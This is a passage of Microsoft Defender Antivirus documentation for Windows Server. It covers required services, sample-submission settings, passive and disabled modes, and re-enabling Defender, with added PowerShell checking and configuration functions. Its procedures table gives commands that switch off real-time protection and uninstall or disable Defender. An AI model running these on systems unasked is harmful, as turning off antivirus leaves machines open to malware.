File Location: C:\WINDOWS\System32\svchost.exe -k WerSvcGroup
Description: This service sends error reports back to Microsoft.

Service Name: Windows Defender Firewall (MpsSvc)
File Location: C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
Description: We recommend keeping the Windows Defender Firewall service enabled.

Service Name: Windows Update (Wuauserv)
File Location: C:\WINDOWS\system32\svchost.exe -k netsvcs
Description: Windows Update is needed to get Security intelligence updates and
antimalware engine updates.

Submit samples
Sample submission allows Microsoft to collect samples of potentially malicious software.
To help provide continued and up-to-date protection, Microsoft researchers use these
samples to analyze suspicious activities and produce updated antimalware Security
intelligence. We collect program executable files, such as .exe files and .dll files. We don't
collect files that contain personal data, like Microsoft Word documents and PDF files.

Submit a file
1. Review the submission guide.

2. Visit the sample submission portal, and submit your file.

Enable automatic sample submission
To enable automatic sample submission, start a Windows PowerShell console as an
administrator, and set the SubmitSamplesConsent value data according to one of the
following settings:

Setting: 0 - Always prompt
Description: The Microsoft Defender Antivirus service prompts you to confirm
submission of all required files. This is the default setting for Microsoft
Defender Antivirus, but isn't recommended for installations on Windows
Server 2016 or 2019, or Windows Server 2022 without a GUI.

Setting: 1 - Send safe samples automatically
Description: The Microsoft Defender Antivirus service sends all files marked as "safe" and
prompts for the remainder of the files.

Setting: 2 - Never send
Description: The Microsoft Defender Antivirus service doesn't prompt and doesn't send
any files.

Setting: 3 - Send all samples automatically
Description: The Microsoft Defender Antivirus service sends all files without a prompt for
confirmation.

Note

This option is not available for Windows Server 2012 R2.
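Added example (not the article's own code) covering three things from this article at once: the services listed in the dependent-services table, the Windows Update configuration for Security intelligence updates, and the SubmitSamplesConsent setting from the table above. The function name and the 7-day signature-age threshold are my choices. The article does not give a registry path for AUOptions, so the Group Policy location HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU is used on the assumption that Windows Update is policy-managed. One caveat for the sc query commands shown earlier: inside PowerShell, sc is an alias for Set-Content, so type sc.exe there.

```powershell
# Added example, not from the Microsoft article. Run as an administrator on the
# Windows Server being checked.
function Test-DefenderServerPrerequisites {
    [CmdletBinding()]
    param(
        # Age after which Security intelligence is flagged as stale (my own threshold).
        [int]$MaxSignatureAgeDays = 7
    )

    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Check, $Value, [bool]$Pass) {
        $findings.Add([pscustomobject]@{ Check = $Check; Value = $Value; Pass = $Pass })
    }

    # Services from the article's table. WinDefend must be running; the others only
    # need to be enabled (Error Reporting and Windows Update are started on demand).
    $services = [ordered]@{
        WinDefend = @{ Desc = 'Windows Defender Service';        MustRun = $true  }
        WerSvc    = @{ Desc = 'Windows Error Reporting Service'; MustRun = $false }
        MpsSvc    = @{ Desc = 'Windows Defender Firewall';       MustRun = $false }
        wuauserv  = @{ Desc = 'Windows Update';                  MustRun = $false }
    }
    foreach ($name in $services.Keys) {
        $label = "$($services[$name].Desc) ($name)"
        $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
        if (-not $svc) { Add-Finding $label 'NotInstalled' $false; continue }
        $ok = if ($services[$name].MustRun) { $svc.Status -eq 'Running' }
              else { $svc.StartType -ne 'Disabled' }
        Add-Finding $label "$($svc.Status), start type $($svc.StartType)" $ok
    }

    # AUOptions: values 3 and 4 let Windows Update fetch Security intelligence
    # automatically. Assumption: the policy key is used, as the article names Group Policy.
    $au = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' `
                           -Name AUOptions -ErrorAction SilentlyContinue
    $auValue = if ($au) { $au.AUOptions } else { 'NotConfigured (server default: no automatic install)' }
    Add-Finding 'Windows Update AUOptions (policy)' $auValue ([bool]($au -and ($au.AUOptions -in @(3, 4))))

    # Security intelligence freshness, using the last-updated timestamp Defender reports.
    $status = Get-MpComputerStatus
    $age = (Get-Date) - $status.AntivirusSignatureLastUpdated
    Add-Finding 'Security intelligence age (days)' ([math]::Round($age.TotalDays, 1)) ($age.TotalDays -le $MaxSignatureAgeDays)

    # SubmitSamplesConsent, 0-3 as in the table above. 0 (Always prompt) is the default
    # but is not recommended on servers without a GUI, so it is flagged.
    $consent = [int](Get-MpPreference).SubmitSamplesConsent
    $consentNames = @{ 0 = 'Always prompt'; 1 = 'Send safe samples automatically'
                       2 = 'Never send';    3 = 'Send all samples automatically' }
    Add-Finding 'SubmitSamplesConsent' "$consent - $($consentNames[$consent])" ($consent -ne 0)

    $findings
}

# Usage: show failing checks first.
Test-DefenderServerPrerequisites | Sort-Object Pass | Format-Table -AutoSize
```

To change the sample-submission setting the table describes, run Set-MpPreference -SubmitSamplesConsent with the value you want (for example 1 for safe samples only), then re-run the check.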


Configure automatic exclusions
To help ensure security and performance, certain exclusions are automatically added
based on the roles and features you install when using Microsoft Defender Antivirus on
Windows Server 2016 or 2019, or Windows Server 2022.

See Configure exclusions in Microsoft Defender Antivirus on Windows Server.

Passive mode and Windows Server
If you're using a non-Microsoft antivirus product as your primary antivirus solution on
Windows Server, you must set Microsoft Defender Antivirus to passive mode or disabled
mode manually. If your Windows Server endpoint is onboarded to Microsoft Defender
for Endpoint, you can set Microsoft Defender Antivirus to passive mode. If you're not
using Microsoft Defender for Endpoint, set Microsoft Defender Antivirus to disabled
mode.

 Tip

See Microsoft Defender Antivirus compatibility with other security products.

The following table describes methods to set Microsoft Defender Antivirus to passive
mode, disable Microsoft Defender Antivirus, and uninstall Microsoft Defender Antivirus:

Procedure: Set Microsoft Defender Antivirus to passive mode by using a registry key
Description: Set the ForceDefenderPassiveMode registry key as follows:
- Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
- Name: ForceDefenderPassiveMode
- Type: REG_DWORD
- Value: 1

Procedure: Turn off the Microsoft Defender Antivirus user interface using PowerShell
Description: Open Windows PowerShell as an administrator, and run the following
PowerShell cmdlet: Uninstall-WindowsFeature -Name Windows-Defender-GUI

Procedure: Disable Microsoft Defender Antivirus Realtime Protection using PowerShell
Description: Use the following PowerShell cmdlet: Set-MpPreference -DisableRealtimeMonitoring $true

Procedure: Disable Microsoft Defender Antivirus using the Remove Roles and Features wizard
Description: See Install or Uninstall Roles, Role Services, or Features, and use the
Remove Roles and Features Wizard.

When you get to the Features step of the wizard, clear the Windows Defender
Features option.

If you clear Windows Defender by itself under the Windows Defender Features
section, you're prompted to remove the interface option GUI for Windows Defender.

Microsoft Defender Antivirus runs normally without the user interface, but the user
interface can't be enabled if you disable the core Windows Defender feature.

Procedure: Uninstall Microsoft Defender Antivirus using PowerShell
Description: Use the following PowerShell cmdlet: Uninstall-WindowsFeature -Name Windows-Defender

Procedure: Disable Microsoft Defender Antivirus using Group Policy
Description: In your Local Group Policy Editor, navigate to Administrative Template >
Windows Component > Endpoint Protection > Disable Endpoint Protection, and then
select Enabled > OK.

For more information, see Working with Registry Keys.

Are you using Windows Server 2012 R2 or Windows Server 2016?
If your Windows Server is onboarded to Microsoft Defender for Endpoint, you can run
Microsoft Defender Antivirus in passive mode on Windows Server 2012 R2 and Windows
Server 2016. See the following articles:

Options to install Microsoft Defender for Endpoint

Microsoft Defender Antivirus compatibility with other security products

What happens if a non-Microsoft antivirus product is uninstalled?
If a non-Microsoft antivirus product was installed on Windows Server, Microsoft
Defender Antivirus was probably set to passive mode. When the non-Microsoft antivirus
product is uninstalled, Microsoft Defender Antivirus should switch to active mode
automatically. However, that might not occur on certain versions of Windows Server,
such as Windows Server 2016. Use the following procedure to check the status of
Microsoft Defender Antivirus, and if necessary, set it to active mode:

1. Check the status of Microsoft Defender Antivirus by following the guidance in
Verify Microsoft Defender Antivirus is running (in this article).

2. If necessary, set Microsoft Defender Antivirus to active mode manually by
following these steps:

a. On your Windows Server device, open Registry Editor as an administrator.

b. Go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Advanced Threat Protection.

c. Set or define a REG_DWORD entry called ForceDefenderPassiveMode, and set its
value to 0.

d. Reboot the device.
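The registry-key procedure in the passive-mode table and the four manual steps above write the same REG_DWORD. As an added example (not code from the article), here is a PowerShell function, Set-DefenderAntivirusMode (my own name), that writes ForceDefenderPassiveMode to 1 or 0 at the path the article gives, reads it back, and surfaces the two conditions the Important note in this article warns about: passive mode requires a device onboarded to Defender for Endpoint, and with tamper protection on, an active device will not go back to passive. The onboarding check assumes the Defender for Endpoint sensor service is named Sense, which this page does not state. A reboot is still required after the change, as step d says.

```powershell
# Added example, not from the Microsoft article. Run as an administrator;
# supports -WhatIf so the change can be previewed first.
function Set-DefenderAntivirusMode {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)]
        [ValidateSet('Active', 'Passive')]
        [string]$Mode
    )

    # Path, name, type and values exactly as given in the passive-mode table.
    $regPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    $name    = 'ForceDefenderPassiveMode'
    $value   = if ($Mode -eq 'Passive') { 1 } else { 0 }

    $status = Get-MpComputerStatus

    if ($Mode -eq 'Passive') {
        # Passive mode is only supported on devices onboarded to Defender for Endpoint.
        # Assumption: the sensor service is called 'Sense' (not named on this page).
        $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
        if (-not $sense -or $sense.Status -ne 'Running') {
            Write-Warning 'Defender for Endpoint sensor service (Sense) is not running; passive mode requires an onboarded device.'
        }
        # With tamper protection on, an active device cannot be moved back to passive.
        if ($status.IsTamperProtected -and $status.AMRunningMode -eq 'Normal') {
            Write-Warning 'Tamper protection is enabled and Defender Antivirus is active; ForceDefenderPassiveMode=1 will not switch it to passive mode.'
        }
    }

    if (-not (Test-Path -Path $regPath)) {
        if ($PSCmdlet.ShouldProcess($regPath, 'Create registry key')) {
            $null = New-Item -Path $regPath -Force
        }
    }
    if ($PSCmdlet.ShouldProcess("$regPath\$name", "Set REG_DWORD to $value")) {
        $null = New-ItemProperty -Path $regPath -Name $name -PropertyType DWord -Value $value -Force
    }

    # Read back what is now stored; the new mode takes effect after a reboot.
    $stored = (Get-ItemProperty -Path $regPath -Name $name -ErrorAction SilentlyContinue).$name
    [pscustomobject]@{
        RequestedMode             = $Mode
        ForceDefenderPassiveMode  = $stored
        AMRunningModeBeforeReboot = $status.AMRunningMode
        RebootRequired            = $true
    }
}

# Usage: preview first, then apply to return the device to active mode (step c above).
Set-DefenderAntivirusMode -Mode Active -WhatIf
Set-DefenderAntivirusMode -Mode Active
```

After the reboot, Get-MpComputerStatus should report AMRunningMode as Normal; if it still shows passive mode, check the "Turn off Windows Defender" policy and the troubleshooting items in the Tip below.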

 Tip

If you still need help, see the following troubleshooting items:

Microsoft Defender Antivirus seems to be stuck in passive mode.
I'm having trouble re-enabling Microsoft Defender Antivirus on Windows
Server 2016.

See also
Microsoft Defender Antivirus in Windows
Microsoft Defender Antivirus compatibility with other security products
Performance analyzer for Microsoft Defender Antivirus



Enable and update Defender Antivirus to the latest version on Windows Server
Article • 01/31/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

If you wish to use Microsoft Defender Antivirus on your Windows Server, and it had
been previously disabled or uninstalled, you may need to take further steps to re-enable
it and ensure it's fully updated.

To enable and update Microsoft Defender Antivirus on Windows Server, perform the
following steps:

1. Install the latest Servicing Stack Update (SSU).

2. Install the latest cumulative update (LCU).

3. Reinstall Microsoft Defender Antivirus or re-enable it. For more information on
how to reinstall or re-enable Microsoft Defender Antivirus on Windows Server, see
Re-enable Microsoft Defender Antivirus on Windows Server if it was disabled and
Re-enable Microsoft Defender Antivirus on Windows Server if it was uninstalled.

4. Reboot the system.

5. Install the latest version of the platform update.

Note

Re-enabling Microsoft Defender Antivirus doesn't automatically install the
platform update. You can download and install the latest platform version
using Windows Update. Alternatively, you can download the update package
from the Microsoft Update Catalog or from the Antimalware and cyber
security portal.

If you're preparing to install the modern, unified solution on Windows Server
2016, you can leverage the Installer help script to automate the platform
update and the subsequent installation and onboarding. This script can also
assist in re-enabling Microsoft Defender Antivirus.

Re-enable Microsoft Defender Antivirus on Windows Server if it was disabled
First, ensure that Microsoft Defender Antivirus is not disabled either through Group
Policy or registry. For more information, see Troubleshoot Microsoft Defender Antivirus
while migrating from a third-party solution.

If Microsoft Defender Antivirus features and installation files were previously removed
from Windows Server 2016, follow the guidance in Configure a Windows Repair Source
to restore the feature installation files.

On Windows Server 2016, in some cases, you may need to use the Malware Protection
Command-Line Utility to re-enable Microsoft Defender Antivirus.

As a local administrator on the server, perform the following steps:

1. Open Command Prompt.
2. Run the following command: MpCmdRun.exe -wdenable.
3. Restart the device.

Re-enable Microsoft Defender Antivirus on Windows Server if it was uninstalled
In case the Defender feature was uninstalled/removed, you can add it back.

As a local administrator on the server, perform the following steps:

1. Open Windows PowerShell.

2. Run the following commands:

PowerShell

# For Windows Server 2016
Dism /Online /Enable-Feature /FeatureName:Windows-Defender-Features
Dism /Online /Enable-Feature /FeatureName:Windows-Defender
Dism /Online /Enable-Feature /FeatureName:Windows-Defender-Gui

# For Windows Server 1803 and later, including Windows Server 2019 and 2022
Dism /Online /Enable-Feature /FeatureName:Windows-Defender

When the DISM command is being used within a task sequence running
PowerShell, the following path to cmd.exe is required.

PowerShell

C:\Windows\System32\cmd.exe /c Dism /Online /Enable-Feature /FeatureName:Windows-Defender-Features
C:\Windows\System32\cmd.exe /c Dism /Online /Enable-Feature /FeatureName:Windows-Defender

Note

You can also use Server Manager or PowerShell cmdlets to install the
Microsoft Defender Antivirus feature.

3. Reboot the system.
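Putting the two re-enable paths together, here is an added PowerShell example (not the article's own script): it reinstalls the Windows-Defender feature with Install-WindowsFeature if it is missing (the cmdlet route the Note mentions), reports whether the feature is disabled by policy, runs MpCmdRun.exe -wdenable from the Windows Defender program folder for the Windows Server 2016 case, and then reports the WinDefend service state and the platform version so you can tell whether step 5 of the procedure (the platform update) is still outstanding. The function name Restore-DefenderAntivirusOnServer is mine; DisableAntiSpyware is a well-known Defender policy value that the article does not name, and it is only read here, never written.

```powershell
# Added example, not from the Microsoft article. Requires the ServerManager
# module (Windows Server) and an elevated session; a reboot follows, as in step 3.
function Restore-DefenderAntivirusOnServer {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        # Also install the GUI feature, as the Windows Server setup article allows.
        [switch]$IncludeGui
    )

    Import-Module ServerManager -ErrorAction Stop
    $report = [ordered]@{}

    # 1. Feature state: Get-WindowsFeature reports whether Windows-Defender is installed.
    $feature = Get-WindowsFeature -Name Windows-Defender
    $report.FeatureInstalledBefore = [bool]$feature.Installed
    $report.RestartNeeded = 'No'
    if (-not $feature.Installed) {
        $names = @('Windows-Defender')
        if ($IncludeGui) { $names += 'Windows-Defender-GUI' }
        if ($PSCmdlet.ShouldProcess(($names -join ', '), 'Install-WindowsFeature')) {
            $install = Install-WindowsFeature -Name $names
            $report.InstallSucceeded = $install.Success
            $report.RestartNeeded    = $install.RestartNeeded.ToString()
        }
    }

    # 2. Policy check: the article says to make sure Defender isn't disabled through
    #    Group Policy or the registry first. DisableAntiSpyware is the well-known policy
    #    value behind that (assumption: this page does not name it).
    $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' `
                               -Name DisableAntiSpyware -ErrorAction SilentlyContinue
    $report.DisabledByPolicy = ($null -ne $policy -and $policy.DisableAntiSpyware -eq 1)
    if ($report.DisabledByPolicy) {
        Write-Warning 'Defender Antivirus is disabled by policy; clear that setting before re-enabling.'
    }

    # 3. Windows Server 2016 path: MpCmdRun.exe -wdenable from the Defender program folder.
    $mpCmdRun = Join-Path -Path $env:ProgramFiles -ChildPath 'Windows Defender\MpCmdRun.exe'
    if ((Test-Path -Path $mpCmdRun) -and $PSCmdlet.ShouldProcess($mpCmdRun, '-wdenable')) {
        & $mpCmdRun -wdenable | Out-Null
        $report.WdEnableExitCode = $LASTEXITCODE
    }

    # 4. Current state: service status and platform version. Re-enabling does not
    #    install the platform update (step 5), so compare this version with the latest.
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    $report.WinDefendStatus = if ($svc) { $svc.Status.ToString() } else { 'NotInstalled' }
    try {
        $report.PlatformVersion = (Get-MpComputerStatus -ErrorAction Stop).AMProductVersion
    } catch {
        $report.PlatformVersion = 'Unavailable until the service is running (reboot)'
    }
    [pscustomobject]$report
}

# Usage: preview first, then run for real and reboot.
Restore-DefenderAntivirusOnServer -IncludeGui -WhatIf
Restore-DefenderAntivirusOnServer -IncludeGui
```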

Related articles
Performance analyzer for Microsoft Defender Antivirus



Better together: Microsoft Defender Antivirus and Microsoft Defender for Endpoint
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Microsoft Defender Antivirus is the next-generation protection component of Microsoft
Defender for Endpoint (Defender for Endpoint).

Although you can use a non-Microsoft antivirus solution with Microsoft Defender for
Endpoint, there are advantages to using Microsoft Defender Antivirus together with
Defender for Endpoint. Not only is Microsoft Defender Antivirus an excellent
next-generation antivirus solution, but combined with other Defender for Endpoint
capabilities, such as endpoint detection and response and automated investigation and
remediation, you get better protection that's coordinated across products and services.

13 reasons to use Microsoft Defender Antivirus together with Microsoft Defender for Endpoint

1. Antivirus signal sharing
Why it matters: Microsoft applications and services share signals across your
enterprise organization, providing a stronger single platform. See Insights from the
MITRE ATT&CK-based evaluation of Microsoft Defender for Endpoint.

2. Threat analytics and your score for devices
Why it matters: Microsoft Defender Antivirus collects underlying system data used
by threat analytics and Microsoft Secure Score for Devices. This provides your
organization's security team with more meaningful information, such as
recommendations and opportunities to improve your organization's security posture.

3. Performance
Why it matters: Microsoft Defender for Endpoint is designed to work with Microsoft
Defender Antivirus, so you get better performance when you use these offerings
together. Evaluate Microsoft Defender Antivirus and Microsoft Defender for Endpoint.

4. Details about blocked malware
Why it matters: More details and actions for blocked malware are available with
Microsoft Defender Antivirus and Microsoft Defender for Endpoint. Understand malware
& other threats.

5. Attack surface reduction
Why it matters: Your organization's security team can reduce your vulnerabilities
(attack surfaces), giving attackers fewer ways to perform attacks. Attack surface
reduction uses cloud protection for a number of rules. Get an overview of attack
surface reduction.

6. Network protection
Why it matters: Your organization's security team can protect your network by
blocking specific URLs and IP addresses. Protect your network.

7. Indicators, such as file, IP address, URL, and/or certificate allow or block indicators
Why it matters: Your organization's security team can import threat intel, which
blocks known Indicators of Compromise (IoCs). Get an overview of Indicator of
compromise (IoC).

8. File blocking
Why it matters: Your organization's security team can block specific files. Stop and
quarantine files in your network.

9. Auditing events
Why it matters: Auditing event signals are available in endpoint detection and
response capabilities. (These signals are not available with non-Microsoft antivirus
solutions.)

10. File recovery via OneDrive
Why it matters: If you are using Microsoft Defender Antivirus together with Office 365,
and your device is attacked by ransomware, your files are protected and recoverable.
OneDrive Files Restore and Windows Defender take ransomware protection one step
further.

11. Controlled folder access
Why it matters: Your organization's security team can reduce malware from encrypting
end users' data by preventing unknown applications or services from being able to
write to protected folders. Get an overview of controlled folder access.

12. Geographic data
Why it matters: Compliant with ISO 27001 and data retention, geographic data is
provided according to your organization's selected geographic sovereignty. See
Compliance offerings: ISO/IEC 27001:2013 Information Security Management Standards.

13. Technical support
Why it matters: By using Microsoft Defender for Endpoint together with Microsoft
Defender Antivirus, you have one company to call for technical support. Troubleshoot
service issues and review event logs and error codes with Microsoft Defender
Antivirus.

 Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Learn More
Microsoft Defender for Endpoint

Microsoft Defender Vulnerability Management



Better together: Microsoft Defender Antivirus and Office 365
Article • 10/24/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus
Microsoft 365

Platforms

Windows

You might already know that:

Microsoft Defender Antivirus protects your Windows device from software threats, such
as viruses, malware, and spyware. Microsoft Defender Antivirus is your complete,
ongoing protection, built into Windows 10 and Windows 11, and ready to go. Microsoft
Defender Antivirus is your next-generation protection.

Office 365 includes anti-malware, anti-spam, and anti-phishing protection. With your
Office 365 subscription, you get premium email and calendars, Office apps, 1 TB of
cloud storage (via OneDrive), and advanced security across all your devices. This is
true for home and business users. And if you're a business user, and your
organization is using Office 365 E5, you get even more protection through Microsoft
Defender for Office 365. Microsoft Defender for Office 365 security product overview.

OneDrive, included in Office 365, enables you to store your files and folders online,
and share them as you see fit. You can work together with people (for work or fun),
and coauthor files that are stored in OneDrive. You can also access your files across
all your devices (your PC, phone, and tablet). Manage sharing in OneDrive.

But did you know there are good security reasons to use Microsoft Defender Antivirus
together with Office 365? Here are two:

1. You get ransomware protection and recovery.

2. Integration means better protection.

Read the following sections to learn more.

Ransomware protection and recovery

When you save your files to OneDrive, and Microsoft Defender Antivirus detects a
ransomware threat on your device, the following things occur:

1. You are told about the threat. (If your organization is using Microsoft Defender for
Endpoint, your security operations team is notified, too.)

2. Microsoft Defender Antivirus helps you (and your organization's security team)
remove the ransomware from your device(s). (If your organization is using
Microsoft Defender for Endpoint, your security operations team can determine
whether other devices are infected and take appropriate action, too.)

3. You get the option to recover your files in OneDrive. With the OneDrive Files
Restore feature, you can recover your files in OneDrive to the state they were in
before the ransomware attack occurred. See Ransomware detection and
recovering your files .

Think of the time and hassle this can save.

Integration means better protection

Microsoft Defender for Office 365 integrated with Microsoft Defender for Endpoint
means better protection for your organization. Here's how:

Microsoft Defender for Office 365 safeguards your organization against malicious
threats posed in email messages, email attachments, and links (URLs) in Office
documents.

AND

Microsoft Defender for Endpoint protects your devices from cyber threats, detects
advanced attacks and data breaches, automates security incidents, and improves
your security posture.

SO

Your security operations team can see a list of devices that are used by the
recipients of any detected URLs or email messages, along with recent alerts for
those devices, in the Microsoft Defender portal.

More good reasons to use OneDrive

Protection from ransomware is one great reason to put your files in OneDrive. And there
are several more good reasons, summarized in this video:

https://www.microsoft.com/en-us/videoplayer/embed/70b4d256-46fb-481f-ad9b-
921ef5fd7bed?postJsllMsg=true

Tip

If you're looking for antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Want to learn more? See these resources:

OneDrive
Microsoft Defender for Office 365
Microsoft Defender for Endpoint

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Microsoft Safety Scanner Download
Article • 02/28/2024

Microsoft Safety Scanner is a scan tool designed to find and remove malware from
Windows computers. Simply download it and run a scan to find malware and try to
reverse changes made by identified threats.

Download Microsoft Safety Scanner (32-bit)

Download Microsoft Safety Scanner (64-bit)

Note

Safety Scanner is exclusively SHA-2 signed. Your devices must be updated to support
SHA-2 in order to run Safety Scanner. To learn more, see 2019 SHA-2 Code Signing
Support requirement for Windows and WSUS.

Important information

The security intelligence update version of the Microsoft Safety Scanner matches
the version described in this web page.

Microsoft Safety Scanner only scans when manually triggered. Safety Scanner
expires 10 days after being downloaded. To rerun a scan with the latest antimalware
definitions, download and run Safety Scanner again. We recommend that you always
download the latest version of this tool before each scan.

Safety Scanner is a portable executable and doesn't appear in the Windows Start
menu or as an icon on the desktop. Note where you saved this download.

This tool doesn't replace your antimalware product. For real-time protection with
automatic updates, use Microsoft Defender Antivirus on Windows 11, Windows 10,
and Windows 8 or Microsoft Security Essentials on Windows 7. These antimalware
products also provide powerful malware removal capabilities. If you're having
difficulties removing malware with these products, you can refer to our help on
removing difficult threats.

System requirements
Safety Scanner helps remove malicious software from computers running Windows 11,
Windows 10, Windows 10 Tech Preview, Windows 8.1, Windows 8, Windows 7, Windows
Server 2019, Windows Server 2016, Windows Server Tech Preview, Windows Server 2012
R2, Windows Server 2012, or Windows Server 2008 R2. For details, refer to the Microsoft
Lifecycle Policy.

How to run a scan

1. Download this tool and open it.
2. Select the type of scan that you want to run and start the scan.
3. Review the scan results displayed on screen. For detailed detection results, view
the log at %SYSTEMROOT%\debug\msert.log.

To remove this tool, delete the executable file (msert.exe by default).

For more information about the Safety Scanner, see the support article on how to
troubleshoot problems using Safety Scanner.
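The procedure above leaves two checks to the operator: that the copy of Safety Scanner is still within its 10-day life and that it really is the SHA-2-signed Microsoft binary. The following is an added example, not code from the article, that performs both checks before running the tool and then shows the msert.log the article points to; the download path is yours, and the /Q and /N switches are an assumption taken from the Safety Scanner support article rather than from this page.

```powershell
# Added example, not code from the Microsoft article. Refuses to run a Safety Scanner
# copy that fails the two conditions the article states (a valid SHA-2 Microsoft
# signature; not older than 10 days), then runs it and shows the log the article
# names. Run from an elevated PowerShell session; $ScannerPath is wherever you saved
# the download.

function Test-SafetyScannerDownload {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $ScannerPath,
        [int] $MaxAgeDays = 10   # article: Safety Scanner expires 10 days after download
    )

    if (-not (Test-Path -LiteralPath $ScannerPath)) {
        Write-Warning "Safety Scanner not found at $ScannerPath"
        return $false
    }

    # Age check: an expired copy carries stale definitions, so refuse it up front
    # instead of discovering the expiry after the scan starts.
    $file = Get-Item -LiteralPath $ScannerPath
    $age  = (Get-Date) - $file.CreationTime
    if ($age.TotalDays -ge $MaxAgeDays) {
        Write-Warning ('{0} is {1:N1} days old; download a fresh copy.' -f $file.Name, $age.TotalDays)
        return $false
    }

    # Signature check. Get-AuthenticodeSignature reports the signature status and the
    # signer certificate; the SHA-2 test below is on that certificate's signature
    # algorithm, the nearest thing the cmdlet exposes, not on the file digest itself.
    $sig = Get-AuthenticodeSignature -FilePath $ScannerPath
    if ($sig.Status -ne 'Valid') {
        Write-Warning "Signature status is '$($sig.Status)'; do not run this file."
        return $false
    }
    if ($sig.SignerCertificate.Subject -notmatch 'CN=Microsoft Corporation') {
        Write-Warning "Unexpected signer: $($sig.SignerCertificate.Subject)"
        return $false
    }
    $algo = $sig.SignerCertificate.SignatureAlgorithm.FriendlyName
    if ($algo -notmatch '^sha(256|384|512)') {
        Write-Warning "Signer certificate uses '$algo', not a SHA-2 algorithm."
        return $false
    }
    return $true
}

function Invoke-SafetyScan {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $ScannerPath,
        [switch] $DetectOnly
    )
    if (-not (Test-SafetyScannerDownload -ScannerPath $ScannerPath)) { return }

    # The switches are an assumption taken from the Safety Scanner support article,
    # not from this page: /Q runs without the UI, /N reports detections without
    # removing anything.
    $scanArgs = @('/Q')
    if ($DetectOnly) { $scanArgs += '/N' }

    $proc = Start-Process -FilePath $ScannerPath -ArgumentList $scanArgs -Wait -PassThru

    # Article: detailed detection results are in %SYSTEMROOT%\debug\msert.log
    $log = Join-Path $env:SystemRoot 'debug\msert.log'
    if (Test-Path -LiteralPath $log) {
        Write-Host "Last lines of ${log}:"
        Get-Content -LiteralPath $log -Tail 30
    }
    return $proc.ExitCode
}

# Usage (path is an example): Invoke-SafetyScan -ScannerPath "$env:USERPROFILE\Downloads\MSERT.exe" -DetectOnly
```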

Related resources
Troubleshooting Safety Scanner
Microsoft Defender Antivirus
Microsoft Security Essentials
Removing difficult threats
Submit file for malware analysis
Microsoft antimalware and threat protection solutions


Evaluate Microsoft Defender Antivirus
Article • 07/18/2023

Applies to:

Microsoft Defender Antivirus
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Platforms

Windows

Use this guide to determine how well Microsoft Defender Antivirus protects you from
viruses, malware, and potentially unwanted applications. It explains the important next-
generation protection features of Microsoft Defender Antivirus available for both small
and large enterprises, and how they increase malware detection and protection across
your network.

You can choose to configure and evaluate each setting independently, or all at once. We
have grouped similar settings based upon typical evaluation scenarios, and include
instructions for using PowerShell to enable the settings.

The guide is available in PDF format for offline viewing:

Download the guide in PDF format

You can also download a PowerShell script that enables all the settings described in
the guide automatically. You can obtain the script alongside the PDF download above,
or individually from the PowerShell Gallery:

Download the PowerShell script to automatically configure the settings

Important

The guide is currently intended for single-machine evaluation of Microsoft Defender
Antivirus. Enabling all of the settings in this guide may not be suitable for
real-world deployment.

For the latest recommendations for real-world deployment and monitoring of Microsoft
Defender Antivirus across a network, see Deploy Microsoft Defender Antivirus.

Tip

If you're looking for antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Related topics
Microsoft Defender Antivirus in Windows 10
Deploy Microsoft Defender Antivirus

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Configure Microsoft Defender Antivirus
features
Article • 02/18/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows

You can configure Microsoft Defender Antivirus with a number of tools, such as:

Microsoft Defender for Endpoint Security Policy Management

Microsoft Intune

Microsoft Configuration Manager

Microsoft Configuration Manager Tenant attach

Group Policy

PowerShell cmdlets

Windows Management Instrumentation (WMI)

The following broad categories of features can be configured:

Cloud-delivered protection. See Cloud-delivered protection and Microsoft Defender
Antivirus.

Always-on real-time protection, including behavioral, heuristic, and machine
learning-based protection. See Configure behavioral, heuristic, and real-time
protection.

